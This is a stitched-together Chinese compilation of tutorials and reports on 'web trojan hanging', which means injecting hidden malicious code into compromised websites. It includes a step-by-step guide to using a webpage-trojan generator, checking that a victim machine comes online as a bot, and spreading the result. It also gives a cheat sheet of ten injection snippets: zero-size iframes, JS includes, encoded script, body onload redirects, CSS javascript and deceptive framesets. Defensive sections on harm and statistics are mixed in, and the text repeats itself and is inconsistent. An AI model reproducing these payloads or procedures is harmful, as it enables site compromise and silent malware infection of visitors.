网页挂马详细步骤教程
网站挂马及检测技术
挂马与检测技术报告什么是挂马?所谓的挂马,就是黑客通过各种手段,包括SQL注入,敏感文件扫描,服务器漏洞,程序0day, 等各种方法获得管理员账号,然后登陆后台,通过数据库备份/恢复或者上传漏洞获得一个webshell。
利用获得的webshell修改页面的容,向页面中加入恶意转向代码。
也可以直接通过弱口令获得服务器或者FTP,然后直接对页面直接进行修改。
当你访问被加入恶意代码的页面时,你就会自动的访问被转向的地址或者下载木马病毒。
挂马的危害危害和应用的普及程度有关,上网人人都会,也就是说,人人都可能中毒。
据金山毒霸安全实验室统计,每天有数百万次浏览与挂马网页有关,中毒概率在20%-50%之间。
很多游戏被挂马,黑客目的就是盗取浏览该玩家的游戏账号,而那些大型被挂马,则是为了搜集大量的肉鸡。
被挂马不仅会让自己的失去信誉,丢失大量客户,也会让我们这些普通用户陷入黑客设下的陷阱,沦为黑客的肉鸡。
如果不小心进入了已被挂马的,则会感染木马病毒,以致丢失大量的宝贵文件资料和账号密码,其危害极大。
挂马泛滥的原因利。
病毒木马黑色产业链有丰厚的利润,去年警方抓获的大小姐系列木马案,犯罪集团3个月获得非常收益3000万。
网络应用越普及,黑色产业链的从业者收益也就越高。
挂马围哪些容易被挂马呢?越是流量高的对黑客越有吸引力,黑客攻破一个管理上有漏洞并且流量很高的,一天就可以感染数百万人。
那些与公共事业密切相关的,比如政府机关的,,视频,聊天交友,提供盗版软件破解工具的最容易被入侵,几乎每周出现的热点网络事件都被攻击者利用,网民一不小心就会受热门事件吸引中招。
挂马的常见方式1.框架挂马<iframe src=地址 width=0 height=0></iframe>其中“地址”处可以输入恶意等。
属性为0意味着该框架是不可见的,受害者若不查看源代码很难发现网页木马。
这个方法也是挂马最常用的一段代码,但是随着管理员和广大网民安全意识的提高,只要在源代码中搜索iframe这个关键字,就很容易找到网页木马的源头。
课件:注入和网页挂马
• 一:框架挂马 • <iframe src=地址 width=0 height=0></iframe> • 二:js文件挂马 • 首先将以下代码 • document.write("<iframe width='0' height='0' src='地址'></iframe>"); • 保存为xxx.js, • 则JS挂马代码为 • <script language=javascript src=xxx.js></script> • 三:js变形加密 • <SCRIPT language="JScript.Encode" src=/muma.txt></script> • muma.txt可改成任意后缀
• 2.3 网页挂马演示举例
• 2.3.1 图片伪装演示 • <html> • 1 <iframe src="欺骗网页.html" height=0 width=0></iframe> • 2 <img src="m12.jpg" /> • </html> • 2处:正常的网页内容 • 1处:在iframe标签中,我们嵌入了一个欺骗网页,这个网页
• 八:图片伪装
• <html> • <iframe src="网马地址" height=0 width=0></iframe> • <img src="图片地址"></img>
• </html> • 九:伪装调用:
网站挂马
挂马攻击挂马攻击是指攻击者在已经获得控制权的网站的网页中嵌入恶意代码(通常是通过IFrame、Script引用来实现),当用户访问该网页时,嵌入的恶意代码利用浏览器本身的漏洞、第三方ActiveX漏洞或者其它插件(如Flash、PDF插件等)漏洞,在用户不知情的情况下下载并执行恶意木马。
挂马方式目前挂马的主要方式是通过IFrame与Script嵌入网马URL,比如下面的挂马代码:<iframe src=http://www.cq***.com/Img/ width=0 height=0></iframe>这里通过将IFrame的width与height设置为0,使得嵌入的网马URL在网页上不可见。
<script src=http://%68%68%6A%32***%63%6E></script>这里Script里的URL是经过URL encode编码的。
通过各种编码、混淆、客户端判断等方式来隐藏、保护网马是攻击者挂马常用的手段。
除了这两种常见的挂马方式外,还有如下几种:1、利用JavaScript执行各种经过编码、混淆的攻击代码进行挂马。
2、利用网页跳转、弹出新窗口等方式进行挂马。
3、利用Flash等媒体封装的方式进行挂马。
4、在CSS(层叠样式表)里可以执行JavaScript的浏览器中进行挂马。
挂马常见类型常见的几种类型如下:1、数据库挂马攻击者利用SQL注入漏洞将挂马代码注入到数据库的某些字段中,如果网站页面使用到这些字段的值,并且没做适当的过滤,就有可能导致用户访问该网站的页面时执行攻击者注入的代码。
2、文件挂马攻击者直接将挂马代码批量写入服务端文件里以达到整站挂马的目的。
3、ARP挂马在与目标站点同一局域网的情况下,攻击者可以通过控制局域网中任意一台主机计算机发起ARP欺骗,并将挂马代码注入到用户请求的响应页面上,从而达到隐蔽的挂马目的。
网页挂马之实战详解
网页挂马之实战详解不论是那一种帮凶,黑客都希望能在被黑者不怀疑、杀毒软件抓不到的情况下,顺利将木马保存到被黑电脑中然后运行,经过多年的演变与发展,目前有经验的黑客最常使用的方法就是利用木马网页…也就是说黑客会先针对某个漏洞 (通常是 Windows 或 IE 的漏洞) 设计出一个特殊的网页 (也就是木马网页),当被黑者浏览这个网页,就会利用该漏洞无声无息的趁机将木马下载到被黑电脑中然后运行 (若被黑电脑已修补该漏洞,此方法当然就无效)。
一般而言黑客想要利用漏洞来进行黑客任务,几乎都必须自己写工具程序才行,不过在黑客的世界中永远有奉献出自己心力的慈善家,因此网络上就有一些针对某些漏洞而设计的木马生成器,让许多黑客 (特别是初学者黑客) 可以不必学习高深的编程就能轻易的利用这类工具来进行黑客任务,在本问题中我们就是要详细讨论黑客如何利用这类工具来进行工作。
由于这类工具是帮助真正的木马植入被黑电脑中与运行,因此应该称为木马帮凶,而不是真正的木马,因此严格来说它应该是木马帮凶生成器,而不是木马生成器,像 Sub7 editserver.exe 或 Optix PRO Builder.exe 才算是名符其实的木马生成器。
◎木马帮凶生成器的问题与盲区可能有读者会认为:既然有现成的工具,那要设计一个木马网页就不是难事! 在网络随便查找就有一大堆,的确没错,虽然在搜索网站输入网马生成器、木马生成器就可找到很多 (大多是在我国内地),但是有经验黑客并不会因此而高兴,因为这些木马帮凶生成器的问题很多,并非找到后下载就能顺利使用,主要有下列问题:.虽然在查找网站中有找到,但单击后该网页已经不见了,当然也就不可能下载木马帮凶生成器,这种情况很常见,只好再试下一个查找到的项目。
.有些木马生成器是利用一年前或是更久之前的漏洞 (Windows 系统或 IE 的漏洞) 设计的,就算下载后可以正常使用,但对于已修补该漏洞的电脑当然就无效,也就是说年代愈久,木马生成器愈没有利用的价值 (对许多电脑可能都无效),因此这类木马查找到一大堆也几乎是废物。
网页挂马手段全解析
---------------------------------------------------------------最新资料推荐------------------------------------------------------网页挂马手段全解析网页挂马是近几年来黑客的主流攻击方式之一,在 2008 年到2010 年间,网页挂马攻击更是成为了黑客最主要的攻击手段。
根据瑞星云安全系统监测, 2008 年到 2010 年间,客户端受到恶意网马的年攻击次数达到千万级别。
虽然近两年来,网络钓鱼攻击已经在数量上超越了网页挂马攻击,但是网页挂马攻击所带来的危害依然巨大,不仅对网站的安全运行造成威胁,对客户端用户来说,网马攻击将直接造成游戏账号密码及银行账号密码被窃取、敏感信息泄露等严重影响。
常见挂马方式解析网页挂马攻击指黑客在入侵网站成功获取网站权限以后,在网站的页面中插入一些代码,当浏览者访问到这些包含有恶意代码的网页时,就会在不知不觉中执行相应的漏洞利用程序。
这些程序可以在浏览者的电脑上下载并执行木马程序,导致浏览者的电脑成为黑客的肉鸡。
挂马操作可以有多种方式实现,以下是比较常见的几种挂马攻击手段。
1. 框架挂马框架挂马是指在网页中创建一个宽度和高度都为 0 的框架,在访问网页时,从网页表面是无法通过肉眼看到这个框架的,只能通过网页源码分析或抓包的方式查看到相应的数据信息。
1 / 22. JS 文件挂马 JS 文件挂马是指黑客插入 JS 代码到网页中,同时恶意篡改网站文件中的 JS 文件代。
一般来讲,那些被全站引用的 JS 代码最容易被黑客挂马。
3. JS 变形加密 JS 变形加密一般是使用某种加密方式对 JS 文件挂马代码进行加密处理,黑客通过加密代码的方式隐藏了该信息。
4. body 挂马 body 挂马是通过向 body 标签插入恶意代码实现的,当用户访问挂有以上代码的网页时,页面就会自动跳转去执行黑客指定的恶意页面,从而导致挂在恶意页面的木马在本地被执行。
网页挂马的流程
网站挂马攻击主要是指入侵者在入侵成功后修改了网站的某一些或者全部的网页文件,如果网站存在SQL注入漏洞,则比较容易取得一定的权限。
如果在服务器上对网站目录等做了较严格的权限限制,也是比较容易取得Webshell权限,具有Webshell权限可以对网页文件进行修改,而挂马就是在网页中加入一些代码。
这些代码往往是利用浏览器或者应用程序的漏洞,浏览者在访问这些网页时,往往会在不知不觉中去下载一些木马程序来执行。
网站挂马的原理就是设置框架网页的宽度和高度为0,将一些恶意网页隐藏起来,用户访问网站时不容易觉察。
目前在网络上有很多网页木马生成器,简称“网马生成器”,本案例以“Ms-0733网马生成器”为例,来讲解如何进行网站挂马攻击。
步骤一配置网页木马。
在使用“Ms-0933网马生成器”配置前需要准备好一款已经配置好的木马服务端,然后直接运行“Ms-0933网马生成器”在网马地址中输入“/test.exe”,如图1所示,然后单击“生成木马”即可生成一网页文件HACKLL.HTM。
配置Ms-0733网马生成器步骤二修改网站网页文件。
在网站首页文件index.asp中加入已经配置好的网页木马htm文件,一般通过在页面中加入“”来实现,如图2所示。
加入木马代码到正常网页网页木马利用的是IE浏览器存在的漏洞,其网页木马最本质的东西有两个一个是脚本,另外一个是真正的木马服务端,利用脚本来直接执行木马服务端或者通过下载者来下载木马服务端然后再执行。
其网页木马文件中多是一些JavaScript代码,如图3所示。
网页木马源代码测试网页木马是否能够正常执行。
在未安装微软的MS0933补丁程序的虚拟机中打开浏览器,并在其中输入网页木马的地址,一会儿后,在控制端就看见肉鸡上线了。
大量传播网页木马。
网页木马测试成功以后,就可以将其配置好的网页木马放入一些提供Web服务的肉鸡上,只要访问者的系统未安装其网页木马利用的漏洞,如果系统未安装任何对网页木马进行防御的软件,则计算机感染网页木马的几率非常大。
网页挂马及其防御
网页挂马及其防御2010年10月29日文/ H3C攻防研究团队如今在互联网上,“网页挂马”是一个出现频率很高的词汇。
关于某些网站被挂马导致大量浏览用户受到攻击,甚至造成财产损失的新闻屡见不鲜。
而这些挂马事件总能和一些软件漏洞联系起来。
那么,什么是网页挂马?网页挂马和软件漏洞有什么联系?它的危害在什么地方,又该如何防御呢?本文结合攻防研究中的经验体会,将就这些问题进行探讨。
网页挂马简介什么是网页挂马要解释什么是网页挂马,要先从木马说起。
大家知道,木马是一类恶意程序,和其它的正常文件一样存在于计算机系统中。
这些恶意程序一旦运行,会连接到远处的控制端,使其享有恶意程序所在系统的大部分操作权限,例如给计算机增删密码,浏览、移动、复制、删除文件,修改注册表,更改计算机配置等各种有害操作,而这些操作往往不被使用者察觉。
将木马与网页结合起来成为网页木马,表面看似正常的网页,当浏览者浏览该网页的同时也运行了木马程序。
网页木马利用系统、浏览器或浏览器相关插件自身存在的漏洞,自动下载已经放置在远端的恶意程序。
由于下载过程利用了软件上的漏洞,是非正常途径,不会被计算机系统或浏览器本身所察觉。
网页挂马指的是攻击者篡改了正常的网页,向网页中插入一段代码,当用户浏览网页的同时执行这段代码,将引导用户去浏览放置好的网页木马。
使用一些特别的技术可以使得这段代码的执行对用户来说不可见。
网页挂马的危害性浏览器、应用软件或系统总是存在各种各样的漏洞,只要这些漏洞能够被利用并执行任意代码,那么存在漏洞的系统就有可能受到网页木马攻击。
网页挂马的技术门槛并不高,互联网上可以得到很多现成的攻击工具。
同时网页木马隐蔽性高,挂马所用代码在浏览器中的执行、网页木马的执行和恶意程序的下载运行,用户都无法察觉。
网页挂马的传播范围同被挂马网页的数量和浏览量成正比。
各种类型的网站都可以成为网页挂马的对象。
上述这些原因使得网页挂马成为攻击者传播木马或病毒的最有效手段之一。
挂马方法和技巧详解
(5) 在影音文件中挂马。
所需工具是RealMedia Editor,打开工具后,然后依次选择“文件”-“打开Real媒体文件”,然后选择需要编辑的视频文件,其格式必须是RealOne公司的以RM或 RMVB为扩展名的文件。接着,新建一个文本,在里面输入u 00:00:10:0 00:00:30.0&&_rpexternal& /horse.htm (00:00:10.0就是发生第一事件的时间,这里是让计算机弹出网页;00:00:30.0同样,这是第二次发生的时间,在0时0分第30秒0微妙时弹出窗口;而后面的URL地址就是连接指定的木马地址。)
3,如何才能挂到马
拿到了webshell的话,挂马自然是很简单了。但是拿不到的情况下,如果注入点有update权限,我们可以仔细查找首页中的某条新闻的调用链接,然后update数据库达到我们的目的。如果可进入后台,我没就可以在一些发公告的地方写入自己的木马代码(不过千万别打乱前台html源文件里的代码逻辑)。
(2) 再隐藏一点的就是js挂马了。
像再原来的网页中写入<script str=/horse.js></script> ,horse里的js写法一般为 document.write(’http:\/\/\/horse.html’>;,或者专业一点的写法是 top.document.body.innerHTML = top.document.body.innerHTML + ‘\r\n<inframe src=/horse.htm/”></iframe>’’;。不过第2种写法要注意:是原来的网页种要有body标签。
3) 在 css中挂马。
这个方法就是在css中写入
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
∙∙当前位置 : 主页 > 网络安全 > 黑客教程 >网页挂马详细步骤教程来源:互联网作者:佚名时间:04-30 13:19:33【大中小】点评:其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。
下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中:其实很简单的的,说到原理,就一个:就是在人家网站的主页那里插入一个自己的网马的页面,等有漏洞的人查看了人家网站的主页,那么他就成了你的肉鸡了。
下面我介绍5种方法,我一个一个介绍方法一:这个就是最简单的了,只要你懂点html语言把下面这段代码插进网页中:<iframe src="这里换成你的网马的地址" width="0" height="0"frameborder="0"></iframe>我来插入,理论上来说插到任何地方都行,只是不要把html语言给弄乱了就行本来没有插进去的页面就是这样,不知道网易那里有没有弹出的广告了,好我们运行,注意到网页的左下角的网址变化看到左下角了吧,那里在请求,说明我们插入进去的页面也运行了,哦,还有个弹出的窗口,给我的工具拦了,我来刷新一次,看到吧width="0" height="0" frameborder="0"就是大小高度的意思,我们把他设置为零,那我们就不能看到网页的内容了看下一种方法,把原来插进去的清理掉先,等下那个文件还要用方法二:这个就是脚本<SCRIPT language=javascript>window.open("/test.htm","","toolbar=no,location=no,directorie s=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>我们做网页的时候就会加入很多网页特效,同样我们也可以用来打开我们的网马,那么浏览过机子就会中我们的网马了~学过java的都知道上面一段代码的意思了把!打开网站的同时也就打开了我们的/test.htm看我们插进去弹出的窗口给拦了,我去掉先,还是给拦了晕,有个窗口弹了出来,这样子的网马是不保险的……不过也不失为一种方法呃~改成0就更大的窗口了,好,方法而已,只是介绍,下一个方法三:还有一点就是比较隐蔽的那就是使用js文件document.write("<iframe width='0' height='0'src='/mm1.htm'></iframe>");document.write("<iframe width='0' height='0'src='/mm2.htm'></iframe>");我们没必要挂两个网马,就写一个好了额刚才写错位置了保存为mm.js,然后在首页里调用js脚本<script language="javascript" src="</script'>/mm.js"></script>这个就是调用的代码,从这里我们可以看到/mm.js,说明我们的mm.js 文件可以不传到主机上,这样可以方便我们批量管理我们挂马,传到我们的主页空间上就可以了不过我这里就不传了,就用本地的吧,运行左下角……调用了163的了,再刷新下,看清楚点,OK下一种方法方法五:再一种代码就是调用其他网页的页面文件,可以将下面的代码复制,保存为HTM文件。
<frameset rows="444,0" cols="*"><frame src="/index.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0"><frame src="help.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0"></frameset>打开这个网页文件时显示的是index.htm的内容,而实际上还同时执行了help.htm的代码,大家可以对应自己生成的木马页和想调用的网页来修改help.htm和index.htm,把它们改成你的文件名就可以了。
这个方法以前黑防的文章有,我就直讲运用了我改代码换成其他的页面了,还是要注意页面的左下角,出错了,重来看到左下角了吧,再刷新一次看到了吧,只是太快就没了再说下我们挂马的时候一般选取的页面我们选取用来插马的页面一般是网站的首页比如:index.htm、index.html、index.asp、index.aspx、index.php、index.cgi、index.jsp、default.htm、default.html default.asp default.aspx default.cgi default.jsp default.php等等,大家就自己记录下来吧,其他页面也可以插入,只要人家没有打上补丁一:框架挂马<iframe src=地址 width=0 height=0></iframe>二:js文件挂马首先将以下代码document.write("<iframe width='0' height='0' src='地址'></iframe>");保存为xxx.js,则JS挂马代码为<script language=javascript src=xxx.js></script>三:js变形加密<SCRIPT language="JScript.Encode" src=/muma.txt></script> muma.txt可改成任意后缀四:body挂马<body onload="window.location='地址';"></body>五:隐蔽挂马top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframesrc="/muma.htm/"></iframe>';六:css中挂马body {background-image: url('javascript:document.write("<scriptsrc=/muma.js></script>")')}七:JAJA挂马<SCRIPT language=javascript>window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>八:图片伪装<html><iframe src="网马地址" height=0 width=0></iframe><img src="图片地址"></center></html>九:伪装调用:<frameset rows="444,0" cols="*"><frame src="打开网页" framborder="no" scrolling="auto" noresizemarginwidth="0"margingheight="0"><frame src="网马地址" frameborder="no" scrolling="no" noresizemarginwidth="0"margingheight="0"></frameset>十:高级欺骗<a href="(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a><SCRIPT Language="JavaScript">function www_163_com (){var url="网马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=n o,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=1 0");}</SCRIPT>。